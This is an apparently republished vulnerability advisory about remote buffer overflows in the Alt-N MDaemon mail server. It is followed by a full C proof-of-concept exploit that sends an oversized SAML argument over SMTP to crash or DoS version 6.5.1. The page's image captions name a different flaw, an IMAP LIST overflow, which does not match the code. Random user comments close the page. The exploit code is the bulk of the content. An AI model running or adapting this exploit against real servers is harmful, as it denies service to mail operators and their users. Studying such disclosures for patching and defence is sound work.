source: http://www.securityfocus.com/bid/11238/info
Alt-N MDaemon is reportedly prone to multiple remote buffer overflow vulnerabilities. The vulnerabilities are likely due to a failure of the application to properly validate buffer sizes when processing command argument input.
By sending a large argument to certain SMTP commands or an IMAP command it is possible to cause this issue to present itself. Apparently, the application will not validate the size of the input before copying it into a finite buffer in process memory.
These issues can be leveraged to cause the affected process to crash, denying service to legitimate users. It is conjectured that these issues can also be leveraged to execute arbitrary code with the privileges of the user running the server on an affected computer.
/////////////////////////////////////////////////////////////
// Remote DoS and proof-of-concept exploit //
// for //
// Mdaemon smtp server v6.5.1 //
// and //
// possible other version. //
// Find bug: D_BuG. //
// Author: D_BuG. //
// [email protected] //
// Data: 16/09/2004 //
// NOT PUBLIC! //
// Greets:Rasco. //
/////////////////////////////////////////////////////////////
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int sock,err;
struct sockaddr_in sa;
int main (int argc, char *argv[])
{
printf("Remote DoS and proof-of-concept(buffer overflow) exploitn");
printf(" for n");
printf("Mdaemon smtp server v6.5.1 and possible other version.n");
if(argc!=4)
{
printf("Usage: %s <IPADDRESS> <PORT> <TARGET>n",argv[0]);
printf("Target:n1.DoS.n2.Proof-of-concept(buffer overflow).n");
printf("e.g.:%s 192.168.1.1 25 1n",argv[0]);
exit(-1);
}
sa.sin_family=AF_INET;
sa.sin_port=htons(atoi(argv[2]));
if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
printf("Error inet_ptonn");
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
printf("[~]Connecting...n");
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
{
printf("[-]Connect filed....nExit...n");
exit(-1);
}
int len=247;
if(atoi(argv[3])==2)
{
len++;
}
char szBuffer[len+7];
char buff[len];
char send[]="EHLO testern";
char send3[]="RCPT TO postmastern";
char rcv[1024];
int i;
for(i=0;i<len;i++)
{
buff[i]=0x41;
}
sprintf(szBuffer,"SAML %sn",buff);
printf("[+]Ok!n");
sleep(2);
printf("[~]Get banner...n");
if(read(sock,&rcv,sizeof(rcv)) !=-1){}
if(strstr(rcv,"220")==NULL)
{
printf("[-]Failed!n");
}
else
{
printf("[+]Ok!n");
}
printf("[~]Send EHLO...n");
write(sock,send,sizeof(send)-1);
sleep(2);
memset(rcv,0,1024);
if(read(sock,&rcv,sizeof(rcv)) !=-1){}
if(strstr(rcv,"250")==NULL)
{
printf("[-]Failed...n");
}
else
{
printf("[+]Ok!n");
}
printf("[~]Send SAML...n");
write(sock,szBuffer,strlen(szBuffer));//Send SAML
sleep(2);
memset(rcv,0,1024);
if(read(sock,&rcv,sizeof(rcv)) !=-1){}
if(strstr(rcv,"250")==NULL)
{
printf("[-]Exploit failed...please check your version Mdaemon!n");
printf("[-]Exit...n");
exit(-1);
}
printf("[+]Ok!n");
printf("[~]Send RCPT...nn");
write(sock,send3,sizeof(send3)-1);//Send RCPT
sleep(2);
if(atoi(argv[3])==2)
{
printf("[+]Crash service.....n");
}
else
{
printf("[+]DoS service.....n");
}
printf("[~]Done.n");
close(sock);
return 0;
}
![图片[1]-MDaemon IMAP服务程序LIST命令远程缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png)
CVE编号
![图片[2]-MDaemon IMAP服务程序LIST命令远程缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png)
CNNVD-ID
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666